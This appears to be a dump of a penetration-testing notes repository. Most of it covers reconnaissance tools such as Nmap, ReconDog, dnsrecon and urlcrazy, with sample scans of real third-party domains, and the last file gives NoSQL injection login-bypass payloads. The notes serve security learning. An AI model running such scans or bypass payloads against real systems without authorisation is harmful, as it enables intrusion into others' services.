16 | drwxr-xr-x 2 doaitran doaitran 4096 Jul  2 15:09 lib
17 | doaitran@kali:~/Documents/Tools/angryFuzzer$ python angryFuzzer.py 
18 |    _____                               ___________                    ________        
19 |   /  _  \   ____    ___________ ___.__.\_   _____/_ __________________\_____  \______ 
20 |  /  /_\  \ /    \  / ___\_  __ <   |  | |    __)|  |  \___   /\___   /  _(__  <_  __ "
21 | /    |    \   |  \/ /_/  >  | \/\___  | |     \ |  |  //    /  /    /  /       \  | \/
22 | \____|__  /___|  /\___  /|__|   / ____| \___  / |____//_____ \/_____ \/______  /__|   
23 |         \/     \//_____/        \/          \/              \/      \/       \/       
24 | 
25 | ============>https://github.com/ihebski/angryFuzzer
26 | ===========================================> by Sold1er 
27 | 
28 | usage : python angryFuzzer.py -h
29 | ```
30 | 
31 | ## Scan
32 | 
33 | ```
34 | python angryFuzzer.py -u https://google.com'
35 | //Scan csm: wp, dp
36 | python angryFuzzer.py -u https://google.com --csm wp
37 | ```
38 |

--------------------------------------------------------------------------------
/InformationGathering/Dracnmap.md:
--------------------------------------------------------------------------------
 1 | # Exploit Network and Gathering information
 2 | https://github.com/Screetsec/Dracnmap
 3 | 
 4 | ## Install and setup
 5 | ```
 6 | git clone https://github.com/Screetsec/Dracnmap.git
 7 | ```
 8 | 
 9 | ## Run
10 | 
11 | ```
12 | chmod +x dracnmap-v2.2.sh
13 | sudo ./racnmap-v2.2.sh
14 | 
15 | ```
16 | 
17 | ```
18 |                    0##G8    
19 |                      ####08 
20 |                       8#####8   
21 |                         G#####8   
22 |                          8G#####8   
23 |       #8#########0         #######8   
24 |           8#######0          0#88#####    
25 |             8G####8         8 8#8@@8###   
26 |                8###        G8   8@G######   
27 |                 8##88       8     8######8    
28 |                   G##088          80G##G080   
29 |                     88000000008880#      000    
30 |                           9               0 
31 |        .___                     _______                         
32 |      __| _/___________    ____  \      \   _____ _____  ______  
33 |     / __ |\_  __ \__  \ _/ ___\ /   |   \ /     \__  \ \____  \ 
34 |    / /_/ | |  | \// __ \  \___/     |    \  Y Y  \/ __ \|  |_> >
35 |    \____ | |__|  (____  /\___  >____|__  /__|_|  (____  /   __/ 
36 |         \/            \/     \/        \/      \/     \/|__|    
37 | 
38 |     Script by           :  Edo Maland ( Screetsec ) 
39 |     Version             :  2.1  
40 |     Codename            :  Redline 
41 |     Follow me on Github :  @Screetsec 
42 |     Dracos Linux        :  dracos-linux.org 
43 |  
44 |     =========================================================    
45 |   
46 | 	[01]  REGULER SCAN 
47 | 	[02]  SCAN MULTIPLE IP ADDRESS 
48 | 	[03]  SCAN OS VERSION AND TRACEROUTE 
49 | 	[04]  FIND OUT IF A HOST IS PROTECTED FIREWALL  
50 | 	[05]  EVADING FIREWALLS 
51 | 	[06]  PING PING !!   
52 | 	[07]  WEB SERVICES
53 | 	[08]  NMAP SCRIPT ENGINE - ADVANCED   
54 | 	[09]  ADVANCED NMAP SCANNINGS ( ZENMAP COMMAND ) 
55 | 	[10]  SCANNING TARGET WITH OUTPUT FILES
56 | 	[11]  CREDITS  
57 | 	[12]  EXIT
58 | ```
59 |

--------------------------------------------------------------------------------
/InformationGathering/NMap.md:
--------------------------------------------------------------------------------
 1 | # NMap
 2 | 
 3 | Check the valid IP on a IP range.
 4 | 
 5 | ```
 6 | nmap -sS 192.168.1.*
 7 | ```
 8 | To get started this is a simple command for scanning your local network (class C or /24):
 9 | ```
10 | nmap -sV -p 1-65535 192.168.1.1/24
11 | ```
12 | ## Nmap Target Selection
13 | * Scan a single IP	  ```nmap 192.168.1.1```
14 | * Scan a host	
15 | ```nmap www.testhostname.com```
16 | * Scan a range of IPs	  ```nmap 192.168.1.1-20```
17 | * Scan a subnet	  ```nmap 192.168.1.0/24```
18 | * Scan targets from a text file	  ```nmap -iL list-of-ips.txt```
19 | These are all default scans, which will scan 1000 TCP ports. Host discovery will take place.
20 | 
21 | ## Nmap Port Selection
22 | * Scan a single Port	  ```nmap -p 22 192.168.1.1```
23 | * Scan a range of ports	  ```nmap -p 1-100 192.168.1.1```
24 | * Scan 100 most common ports (Fast)	  ```nmap -F 192.168.1.1```
25 | * Scan all 65535 ports	  ```nmap -p- 192.168.1.1```
26 | 
27 | ## Nmap Port Scan types
28 | * Scan using TCP connect	  ```nmap -sT 192.168.1.1```
29 | * Scan using TCP SYN scan (default)	  ```nmap -sS 192.168.1.1```
30 | * Scan UDP ports	  ```nmap -sU -p 123,161,162 192.168.1.1```
31 | * Scan selected ports - ignore discovery	  ```nmap -Pn -F 192.168.1.1```
32 | 
33 | ## Service and OS Detection
34 | * Detect OS and Services	```nmap -A 192.168.1.1```
35 | * Standard service detection	```nmap -sV 192.168.1.1```
36 | * More aggressive Service Detection	```nmap -sV --version-intensity 5 192.168.1.1```
37 | * Lighter banner grabbing detection	```nmap -sV --version-intensity 0 192.168.1.1```
38 | 
39 | ## Nmap Output Formats
40 | * Save default output to file	```nmap -oN outputfile.txt 192.168.1.1```
41 | * Save results as XML	```nmap -oX outputfile.xml 192.168.1.1```
42 | * Save results in a format for grep	```nmap -oG outputfile.txt 192.168.1.1```
43 | * Save in all formats	```nmap -oA outputfile 192.168.1.1```
44 | *
45 | The default format could also be saved to a file using a simple file redirect command > file. Using the -oN option allows the results to be saved but also can be monitored in the terminal as the scan is under way.
46 | 
47 | ## Digging deeper with NSE Scripts
48 | * Scan using default safe scripts	`nmap -sV -sC 192.168.1.1`
49 | * Get help for a script	`nmap --script-help=ssl-heartbleed`
50 | * Scan using a specific NSE script	`nmap -sV -p 443 –script=ssl-heartbleed.nse 192.168.1.1`
51 | * Scan with a set of scripts	`nmap -sV --script=smb* 192.168.1.1`
52 | 
53 | According to my Nmap install there are currently 471 NSE scripts. The scripts are able to perform a wide range of security related testing and discovery functions. If you are serious about your network scanning you really should take the time to get familiar with some of them.
54 | 
55 | The option `--script-help=$scriptname` will display help for the individual scripts. To get an easy list of the installed scripts try `locate nse | grep script`.
56 | 
57 | You will notice I have used the `-sV` service detection parameter. Generally most NSE scripts will be more effective and you will get better coverage by including service detection.
58 | 
59 | ## A scan to search for DDOS reflection UDP services
60 | * Scan for UDP DDOS reflectors	
61 | ```
62 | nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr 192.168.1.0/24 
63 | ```
64 | 
65 | UDP based DDOS reflection attacks are a common problem that network defenders come up against. This is a handy Nmap command that will scan a target list for systems with open UDP services that allow these attacks to take place. Full details of the command and the background can be found on the Sans Institute Blog where it was first posted.
66 | 
67 | ## HTTP Service Information
68 | * Gather page titles from HTTP services	``` nmap --script=http-title 192.168.1.0/24 ```
69 | * Get HTTP headers of web services	``` nmap --script=http-headers 192.168.1.0/24 ```
70 | * Find web apps from known paths	``` nmap --script=http-enum 192.168.1.0/24 ```
71 | 
72 | There are many HTTP information gathering scripts, here are a few that are simple but helpful when examining larger networks. Helps in quickly identifying what the HTTP service is that is running on the open port. Note the http-enum script is particularly noisy. It is similar to Nikto in that it will attempt to enumerate known paths of web applications and scripts. This will inevitably generated hundreds of ``404 HTTP responses`` in the web server error and access logs.
73 | 
74 | ##  Detect Heartbleed SSL Vulnerability
75 | * Heartbleed Testing	```nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24```
76 | 
77 | Heartbleed detection is one of the available SSL scripts. It will detect the presence of the well known Heartbleed vulnerability in SSL services. Specify alternative ports to test SSL on mail and other protocols (Requires Nmap 6.46).
78 | 
79 | ## IP Address information
80 | * Find Information about IP address	```nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24```
81 | 
82 | Gather information related to the IP address and netblock owner of the IP address. Uses ASN, whois and geoip location lookups. See the IP Tools for more information and similar IP address and DNS lookups.
83 |

--------------------------------------------------------------------------------
/InformationGathering/NetZapper.md:
--------------------------------------------------------------------------------
 1 | ## Information Gathering with NetZapper
 2 | 
 3 | ## Overview
 4 | 
 5 | Url: https://github.com/NetZapper/NetZapper
 6 | 
 7 | ## Clone and Install
 8 | 
 9 | ```
10 | git clone https://github.com/NetZapper/NetZapper.git
11 | ```
12 | 
13 | ### Start NetZapper
14 | Go to NetZapper folder and Run
15 | ``` 
16 | >>> cd NetZapper
17 | >>> chmod + x Net_Zapper_1.py
18 | >>> python Net_Zapper_1.py
19 | NetZapper$ python Net_Zapper_1.py 
20 |  ####     ##		    ##########      					
21 |  ## ##    ## ##### #######          ##     ##     #####  #####  ##### #####	
22 |  ##  ##   ## #        #           ##      #  #    #    # #    # #     #    #	
23 |  ##   ##  ## ####     #    ##   ##       ######   #####  #####  ###   #####	
24 |  ##    ## ## #        #       ##        #      #  #      #      #     # #  	
25 |  ##     #### #####    #      ######### #        # #      #      ##### #  ##	
26 | 
27 | 1.Hosts Discovery
28 | 2.Ports Scanning
29 | 3.OS Detection
30 | 4.Brute Force SSH
31 | Press ctrl+c to exit...
32 | 
33 | ```
34 | ### Options
35 | * Host Discovery
36 | ```
37 | Enter network octects (net id) of ip e.g 192.168.10.*: 172.16.12.*
38 | 
39 | 		Live Hosts are.....
40 | 
41 | 
42 |  IP ADDRESS		  MAC ADDRESS
43 | 
44 | 172.16.12.1		00:0c:29:84:a7:f9
45 | 172.16.12.2		00:0c:29:84:a7:f9
46 | 172.16.12.3		c8:be:19:51:0f:fc
47 | ```
48 | 
49 | 1.Hosts Discovery
50 | 2.Ports Scanning
51 | 3.OS Detection
52 | 4.Brute Force SSH
53 | Press ctrl+c to exit...
54 | ### Ports Scanning
55 | ```
56 | Enter choice: 2
57 | 
58 | Enter Target IP: 172.16.12.236
59 | Enter Ports(separated with spaces and '-' for range: 0-2000
60 | 
61 | Ports scanning started....
62 | 
63 | PORT	STATUS
64 | 135	OPEN
65 | 139	OPEN
66 | 
67 | ```
68 | ### OS Detect
69 | ```
70 | Hosts Discovery
71 | 2.Ports Scanning
72 | 3.OS Detection
73 | 4.Brute Force SSH
74 | Press ctrl+c to exit...
75 | 
76 | Enter choice: 3
77 | 
78 | Enter Target IP: 172.16.12.236
79 | 
80 | 172.16.12.236 belongs to Windows family...
81 | ```
82 |

--------------------------------------------------------------------------------
/InformationGathering/ReconDog.md:
--------------------------------------------------------------------------------
  1 | # ReconDog
  2 | https://github.com/s0md3v/ReconDog
  3 | # Install and Update
  4 | ```
  5 | git clone https://github.com/s0md3v/ReconDog.git
  6 | 
  7 | ```
  8 | 
  9 | # Run
 10 | ```
 11 | python dog.py 
 12 |                                ___       ___
 13 |                               |   \_____/   |
 14 |                              /  |\/     \/|  \    
 15 |                              \_/ | /\ /\ | \_/
 16 |  ____  ____ _____ _____  __   _  |_\/ \/_|  _____   ____   ____
 17 | |___/  |___ |     |    | | \  | /   \o/   \ |    \ |    | | ___
 18 | |   \_ |___ |____ |____| |  \_| \___/'\___/ |____/ |____| |____| v0.8
 19 | 		     Made with <3 By Team Ultimate
 20 | 
 21 | 1. Whois Lookup
 22 | 2. DNS Lookup + Cloudflare Detector
 23 | 3. Zone Transfer
 24 | 4. Port Scan
 25 | 5. HTTP Header Grabber
 26 | 6. Honeypot Detector
 27 | 7. Robots.txt Scanner
 28 | 8. Link Grabber
 29 | 9. IP Location Finder
 30 | 10. Traceroute
 31 | 11. Exit
 32 | 
 33 | ```
 34 | * Whois Lookup
 35 | ```
 36 | Enter your choice: 1
 37 | Enter Domain or IP Address: Google.com
 38 |    Domain Name: GOOGLE.COM
 39 |    Registry Domain ID: 2138514_DOMAIN_COM-VRSN
 40 |    Registrar WHOIS Server: whois.markmonitor.com
 41 |    Registrar URL: http://www.markmonitor.com
 42 |    Updated Date: 2018-02-21T18:36:40Z
 43 |    Creation Date: 1997-09-15T04:00:00Z
 44 |    Registry Expiry Date: 2020-09-14T04:00:00Z
 45 |    Registrar: MarkMonitor Inc.
 46 |    Registrar IANA ID: 292
 47 |    Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
 48 |    Registrar Abuse Contact Phone: +1.2083895740
 49 |    Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
 50 |    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
 51 |    Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
 52 |    Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
 53 |    Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
 54 |    Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
 55 |    Name Server: NS1.GOOGLE.COM
 56 |    Name Server: NS2.GOOGLE.COM
 57 |    Name Server: NS3.GOOGLE.COM
 58 |    Name Server: NS4.GOOGLE.COM
 59 |    DNSSEC: unsigned
 60 |    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
 61 | >>> Last update of whois database: 2018-07-02T09:23:05Z <<<
 62 | ```
 63 | * DNS Lookup + Cloudflare Detector
 64 | ```
 65 | Enter your choice: 2
 66 | Enter Domain: sstectutorials.com
 67 | ;; Truncated, retrying in TCP mode.
 68 | sstectutorials.com.	3601	IN	SOA	pdns1.registrar-servers.com. hostmaster.registrar-servers.com. 2018030304 43200 3600 604800 3601
 69 | sstectutorials.com.	1800	IN	MX	10 eforward2.registrar-servers.com.
 70 | sstectutorials.com.	1800	IN	TXT	"v=spf1 include:spf.efwd.registrar-servers.com ~all"
 71 | sstectutorials.com.	1800	IN	A	198.54.114.169
 72 | sstectutorials.com.	1800	IN	NS	pdns2.registrar-servers.com.
 73 | sstectutorials.com.	1800	IN	MX	10 eforward1.registrar-servers.com.
 74 | sstectutorials.com.	1800	IN	MX	10 eforward3.registrar-servers.com.
 75 | sstectutorials.com.	1800	IN	MX	20 eforward5.registrar-servers.com.
 76 | sstectutorials.com.	1800	IN	NS	pdns1.registrar-servers.com.
 77 | sstectutorials.com.	1800	IN	MX	15 eforward4.registrar-servers.com.
 78 | ```
 79 | * Port scan
 80 | ```
 81 | Enter your choice: 4
 82 | Enter Domain or IP Address: sstectutorials.com
 83 | 
 84 | Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-02 09:28 UTC
 85 | Nmap scan report for sstectutorials.com (198.54.114.169)
 86 | Host is up (0.072s latency).
 87 | rDNS record for 198.54.114.169: server254-1.web-hosting.com
 88 | PORT     STATE    SERVICE        VERSION
 89 | 21/tcp   open     ftp            Pure-FTPd
 90 | 22/tcp   filtered ssh
 91 | 23/tcp   filtered telnet
 92 | 80/tcp   open     http-proxy     HAProxy http proxy
 93 | 110/tcp  open     pop3           Dovecot pop3d
 94 | 143/tcp  open     imap           Dovecot imapd
 95 | 443/tcp  open     ssl/http-proxy HAProxy http proxy
 96 | 3389/tcp filtered ms-wbt-server
 97 | Service Info: Device: load balancer
 98 | 
 99 | ```
100 | * Link Grabber
101 | ```
102 | ots.txt Scanner
103 | 8. Link Grabber
104 | 9. IP Location Finder
105 | 10. Traceroute
106 | 11. Exit
107 | Enter your choice: 8
108 | Enter URL: sstectutorials.com  
109 | https://sstectutorials.com/
110 | 
111 | ```
112 | * Traceroute
113 | ```
114 | 10. Traceroute
115 | 11. Exit
116 | Enter your choice: 10
117 | Enter Domain or IP Address: sstectutorials.com 
118 | Start: Mon Jul  2 09:38:19 2018
119 | HOST: whatweb                                   Loss%   Snt   Last   Avg  Best  Wrst StDev
120 |   1.|-- 45.55.64.254                               0.0%     3    1.3   0.7   0.2   1.3   0.0
121 |   2.|-- 138.197.251.22                             0.0%     3    0.3   0.8   0.3   1.2   0.0
122 |   3.|-- 138.197.244.34                             0.0%     3    0.9   0.9   0.9   1.0   0.0
123 |   4.|-- ce-0-4-0-3.r08.nycmny01.us.bb.gin.ntt.net  0.0%     3    1.2   1.2   1.2   1.2   0.0
124 |   5.|-- ae-3.r24.nycmny01.us.bb.gin.ntt.net        0.0%     3   14.3   6.2   2.1  14.3   7.0
125 |   6.|-- ae-4.r22.sttlwa01.us.bb.gin.ntt.net        0.0%     3   66.0  68.7  66.0  71.4   2.5
126 |   7.|-- ae-0.r23.sttlwa01.us.bb.gin.ntt.net        0.0%     3   64.3  62.1  60.8  64.3   1.9
127 |   8.|-- ae-3.r23.snjsca04.us.bb.gin.ntt.net        0.0%     3   82.7  82.7  82.7  82.8   0.0
128 |   9.|-- 192.80.16.179                              0.0%     3   80.6  80.7  80.6  80.7   0.0
129 |  10.|-- 107.154.13.242.ip.incapdns.net             0.0%     3   84.6  84.6  84.5  84.6   0.0
130 |  11.|-- ???                                       100.0     3    0.0   0.0   0.0   0.0   0.0
131 |  12.|-- 199.193.7.158                              0.0%     3   93.6  93.7  93.5  94.0   0.0
132 |  13.|-- server254-1.web-hosting.com                0.0%     3   95.4  95.3  94.8  95.7   0.0
133 | 
134 | ```
135 |

--------------------------------------------------------------------------------
/InformationGathering/Sublist3r.md:
--------------------------------------------------------------------------------
 1 | # Sublist3r
 2 | Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu, and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster, and ReverseDNS.
 3 | 
 4 | URL: https://github.com/aboul3la/Sublist3r
 5 | ## Install and Setup
 6 | 
 7 | Sublist3r depends on the `requests`, `dnspython`, and `argparse` python modules.
 8 | These dependencies can be installed using the requirements file:
 9 | 
10 | * Installation on Windows:
11 | ``` c:\python27\python.exe -m pip install -r requirements.txt ```
12 | * Installation on Linux
13 | ``` sudo pip install -r requirements.txt ```
14 | Alternatively, each module can be installed independently as shown below.
15 | 
16 | ### Requests Module (http://docs.python-requests.org/en/latest/)
17 | * Install for Windows:
18 | ``` c:\python27\python.exe -m pip install requests ```
19 | * Install for Ubuntu/Debian:
20 | ``` sudo apt-get install python-requests ```
21 | * Install for Centos/Redhat:
22 | ``` sudo yum install python-requests ```
23 | * Install using pip on Linux:
24 | ``` sudo pip install requests ```
25 | ### dnspython Module (http://www.dnspython.org/)
26 | Install for Windows:
27 | c:\python27\python.exe -m pip install dnspython
28 | Install for Ubuntu/Debian:
29 | sudo apt-get install python-dnspython
30 | Install using pip:
31 | sudo pip install dnspython
32 | argparse Module
33 | Install for Ubuntu/Debian:
34 | sudo apt-get install python-argparse
35 | Install for Centos/Redhat:
36 | sudo yum install python-argparse
37 | Install using pip:
38 | sudo pip install argparse
39 | for coloring in windows install the following libraries
40 | 
41 | c:\python27\python.exe -m pip install win_unicode_console colorama
42 | 
43 | 
44 |

--------------------------------------------------------------------------------
/InformationGathering/ToolsForInformationGathering.md:
--------------------------------------------------------------------------------
  1 | # Information Gathering
  2 | 
  3 | ## Overview
  4 | 
  5 | 
  6 | ## Tools
  7 | 
  8 | ### DNS Analysis
  9 | * DNS Map
 10 | ```
 11 | dnsmap [url]
 12 | dnsmap [url] -r [output directory]
 13 | ```
 14 | _Example_
 15 | ```
 16 | oaitran@kali:~$ dnsmap google.com
 17 | dnsmap 0.30 - DNS Network Mapper by pagvac (gnucitizen.org)
 18 | 
 19 | [+] searching (sub)domains for google.com using built-in wordlist
 20 | [+] using maximum random delay of 10 millisecond(s) between requests
 21 | 
 22 | accounts.google.com
 23 | IPv6 address #1: 2404:6800:4005:802::200d
 24 | 
 25 | accounts.google.com
 26 | IP address #1: 216.58.199.13
 27 | 
 28 | admin.google.com
 29 | IPv6 address #1: 2404:6800:4008:c07::66
 30 | 
 31 | admin.google.com
 32 | IP address #1: 216.58.199.14
 33 | 
 34 | ai.google.com
 35 | IPv6 address #1: 2404:6800:4005:802::200e
 36 | 
 37 | ```
 38 | * DNS Enum
 39 | ```
 40 | dnsenum [Url]
 41 | ```
 42 | _Example_
 43 | ```
 44 | oaitran@kali:~$ dnsenum google.com 
 45 | Smartmatch is experimental at /usr/bin/dnsenum line 698.
 46 | Smartmatch is experimental at /usr/bin/dnsenum line 698.
 47 | dnsenum VERSION:1.2.4
 48 | 
 49 | -----   google.com   -----
 50 | 
 51 | 
 52 | Host's addresses:
 53 | __________________
 54 | 
 55 | google.com.                              212      IN    A        216.58.199.14
 56 | 
 57 | 
 58 | Name Servers:
 59 | ______________
 60 | 
 61 | ns2.google.com.                          10870    IN    A        216.239.34.10
 62 | ns1.google.com.                          17697    IN    A        216.239.32.10
 63 | ns3.google.com.                          17697    IN    A        216.239.36.10
 64 | ns4.google.com.                          21595    IN    A        216.239.38.10
 65 | ```
 66 | * DNS Recon
 67 | ```
 68 |   dnsrecon -t std -d  [url]
 69 |   dnsrecon -t axfr -d [url]
 70 |   dnsrecon -t tld -d [url]
 71 | ```
 72 | _Example_
 73 | ```
 74 | oaitran@kali:~$ dnsrecon -t std -d google.com
 75 | [*] Performing General Enumeration of Domain: google.com
 76 | [*] Checking for Zone Transfer for google.com name servers
 77 | [*] Resolving SOA Record
 78 | [+] 	 SOA ns1.google.com 216.239.32.10
 79 | [*] Resolving NS Records
 80 | [*] NS Servers found:
 81 | [*] 	NS ns1.google.com 216.239.32.10
 82 | [*] 	NS ns1.google.com 2001:4860:4802:32::a
 83 | [*] 	NS ns3.google.com 216.239.36.10
 84 | [*] 	NS ns3.google.com 2001:4860:4802:36::a
 85 | [*] 	NS ns4.google.com 216.239.38.10
 86 | [*] 	NS ns4.google.com 2001:4860:4802:38::a
 87 | [*] 	NS ns2.google.com 216.239.34.10
 88 | [*] 	NS ns2.google.com 2001:4860:4802:34::a
 89 | [*] Removing any duplicate NS server IP Addresses...
 90 | [*] ...  
 91 | ```
 92 | * WhatWeb
 93 | ```
 94 |   whatweb [url]
 95 | ```
 96 | _Example_ 
 97 | ```
 98 | oaitran@kali:~$ whatweb google.com
 99 | http://google.com [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[gws], IP[216.58.199.14], RedirectLocation[http://www.google.com/], Title[301 Moved], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]
100 | http://www.google.com/ [200 OK] Cookies[1P_JAR,NID], Country[UNITED STATES][US], HTML5, HTTPServer[gws], HttpOnly[NID], IP[216.58.199.4], Script, Title[Google], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]
101 | 
102 | ```
103 | * dig
104 | ```
105 | dig [url]
106 | ```
107 | _Example_
108 | ```
109 | oaitran@kali:~$ dig facebook.com
110 | 
111 | ; <<>> DiG 9.10.6-Debian <<>> facebook.com
112 | ;; global options: +cmd
113 | ;; Got answer:
114 | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47981
115 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
116 | 
117 | ;; OPT PSEUDOSECTION:
118 | ; EDNS: version: 0, flags:; udp: 4000
119 | ;; QUESTION SECTION:
120 | ;facebook.com.			IN	A
121 | 
122 | ;; ANSWER SECTION:
123 | facebook.com.		266	IN	A	157.240.13.35
124 | 
125 | ;; Query time: 42 msec
126 | ;; SERVER: 192.168.1.12#53(192.168.1.12)
127 | ;; WHEN: Sun Jul 01 11:15:43 +07 2018
128 | ;; MSG SIZE  rcvd: 57
129 | ```
130 | 
131 | * urlcrazy
132 | ``` 
133 | urlcrazy [url]
134 | ```
135 | _Example_
136 | ```
137 | oaitran@kali:~$ urlcrazy google.com
138 | /usr/share/urlcrazy/tld.rb:81: warning: key "2nd_level_registration" is duplicated and overwritten on line 81
139 | /usr/share/urlcrazy/tld.rb:89: warning: key "2nd_level_registration" is duplicated and overwritten on line 89
140 | /usr/share/urlcrazy/tld.rb:91: warning: key "2nd_level_registration" is duplicated and overwritten on line 91
141 | URLCrazy Domain Report
142 | Domain    : google.com
143 | Keyboard  : qwerty
144 | At        : 2018-07-01 12:18:40 +0700
145 | 
146 | # Please wait. 87 hostnames to process
147 | 
148 | Typo Type                     Typo           DNS-A            CC-A              DNS-MX                                Extn  
149 | ----------------------------------------------------------------------------------------------------------------------------
150 | Character Omission            gogle.com      172.217.161.164  US,UNITED STATES                                        com   
151 | Character Omission            googe.com      162.243.10.151                                                           com   
152 | Character Omission            googl.com      172.217.161.164  US,UNITED STATES                                        com   
153 | Character Omission            google.cm      172.217.161.163  US,UNITED STATES  aspmx.l.google.com                    cm    
154 | Character Omission            goole.com      87.106.83.127    DE,GERMANY        mx01.1and1.co.uk                      com   
155 | Character Repeat              ggoogle.com    172.217.161.164  ��,                                                     com   
156 | Character Repeat              googgle.com                     ?                                                       com   
157 | Character Repeat              googlee.com    172.217.161.164  US,UNITED STATES                                        com   
158 | Character Repeat              googlle.com    54.221.207.100   US,UNITED STATES  mx94.mb1p.com                         c
159 | ```
160 | 
161 | * Matasploit
162 | ``` 
163 | msfconsole
164 | msf> whois bdtime.com
165 | ```
166 | _Example_
167 | ```
168 | msf > whois bdtime.com
169 | [*] exec: whois bdtime.com
170 | 
171 |    Domain Name: BDTIME.COM
172 |    Registry Domain ID: 1839746399_DOMAIN_COM-VRSN
173 |    Registrar WHOIS Server: whois.namebright.com
174 |    Registrar URL: http://www.NameBright.com
175 |    Updated Date: 2017-12-20T08:38:02Z
176 |    Creation Date: 2013-12-19T19:01:54Z
177 |    Registry Expiry Date: 2018-12-19T19:01:54Z
178 |    Registrar: EchoDomain LLC
179 | 
180 | ```
181 | Try to exploit:
182 | ```
183 | nslookup url
184 | nmap -sS -Pn Public IP -vv
185 | ```
186 | _Example_
187 | ```
188 | msf > nslookup bdtimes.com
189 | [*] exec: nslookup bdtimes.com
190 | 
191 | Server:		192.168.1.12
192 | Address:	192.168.1.12#53
193 | 
194 | Non-authoritative answer:
195 | Name:	bdtimes.com
196 | Address: 66.198.240.42
197 | msf > sudo nmap -sS -Pn 66.198.240.42 -vv
198 | [*] exec: sudo nmap -sS -Pn 66.198.240.42 -vv
199 | 
200 | [sudo] password for doaitran: 
201 | 
202 | Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-01 12:47 +07
203 | Initiating Parallel DNS resolution of 1 host. at 12:47
204 | Completed Parallel DNS resolution of 1 host. at 12:47, 0.04s elapsed
205 | Initiating SYN Stealth Scan at 12:47
206 | Scanning a2ss51.a2hosting.com (66.198.240.42) [1000 ports]
207 | Discovered open port 110/tcp on 66.198.240.42
208 | Discovered open port 993/tcp on 66.198.240.42
209 | Discovered open port 587/tcp on 66.198.240.42
210 | Discovered open port 443/tcp on 66.198.240.42
211 | Discovered open port 995/tcp on 66.198.240.42
212 | Discovered open port 3306/tcp on 66.198.240.42
213 | Discovered open port 53/tcp on 66.198.240.42
214 | Discovered open port 143/tcp on 66.198.240.42
215 | Discovered open port 21/tcp on 66.198.240.42
216 | Discovered open port 25/tcp on 66.198.240.42
217 | 
218 | ```
219 | ### Network and port scanner
220 | * nmap
221 | 
222 | * 
223 |

--------------------------------------------------------------------------------
/InformationGathering/YukiChan.md:
--------------------------------------------------------------------------------
 1 | #YukiChan
 2 | 
 3 | url: https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest
 4 | 
 5 | ## Install and setup
 6 | 
 7 | ```
 8 | git clone https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest.git
 9 | cd Yuki-Chan-The-Auto-Pentest
10 | chmod 744 yuki.sh wafninja joomscan install-perl-module.sh
11 | 
12 | pip install -r requirements.txt
13 | ./install-perl-module.sh
14 | ```
15 | 
16 | ## Run
17 | 
18 | ```
19 | ./yuki.sh
20 | oaitran@kali:~/Documents/Tools/Yuki-Chan-The-Auto-Pentest$ ./yuki.sh
21 | 
22 |                                                    
23 |             ██╗    ██╗           ██╗    ██ 
24 |             ██║    ██║           ██║   ██╝ 
25 |             ██║    ██║           ██╚═██╝    ██╗ 
26 |             █████████║ ██╗  ██╗  ██ ██║     ══╝   
27 |                 ██╔══╝ ██║  ██║  ██╔═██╗    ██╗
28 |                 ██║    ██║  ██║  ██║   ██╗  ██║
29 |                 ██║    ███████║  ██║    ██╗ ██║ 
30 |                 ══╝    ═══════╝  ══╝    ══╝ ══╝ 
31 |                         The YuKi-Chan         
32 | ╔════════════════════════════════════════════════════════════════╗
33 | ║  Automated Intel-Gathering - Vulnerability Analysis - OSINT    ║
34 | ║  Tracking - System Enumeration - And Off Course Pentesting Too ║
35 | ╚════════════════════════════════════════════════════════════════╝
36 | ╔════════════════════════════════════════════════════════════════╗
37 |  ║         Version : 1.0 | Codename : Waifu Sudah Lacur         ║
38 |    ║    Coded by : Yukinoshita 47 | Garuda Security Hacker    ║
39 |     ║                 Tested on : Kali Linux                 ║
40 |      ║     More Info : http://www.garudasecurityhacker.org  ║
41 |       ╚════════════════════════════════════════════════════╝
42 |          Recode The Copyright Is Not Make You A Coder Dude :p 
43 | ══════════════════════════════════════════════════════════════════
44 | Enter domain of your Target Below example site.com :
45 | sstectutorials.com
46 | 
47 | ```
48 |

--------------------------------------------------------------------------------
/LDAPInjection/Intruders:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/josdoaitran/payload-for-security-testing/d6c38ee272f97fe234ccb2f287310d42d3d1a6b1/LDAPInjection/Intruders

--------------------------------------------------------------------------------
/LDAPInjection/LdapInjection.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/josdoaitran/payload-for-security-testing/d6c38ee272f97fe234ccb2f287310d42d3d1a6b1/LDAPInjection/LdapInjection.md

--------------------------------------------------------------------------------
/NoSQLInjection/NoSQLInjection.md:
--------------------------------------------------------------------------------
 1 | # NoSQLInjection
 2 | 
 3 | ## Exploit
 4 | _Basic authentication bypass using not equal ($ne) or greater ($gt)_
 5 | ```
 6 | in URL
 7 | username[$ne]=toto&password[$ne]=toto
 8 | 
 9 | in JSON
10 | {"username": {"$ne": null}, "password": {"$ne": null} }
11 | {"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
12 | {"username": {"$gt": undefined}, "password": {"$gt": undefined} }
13 | ```
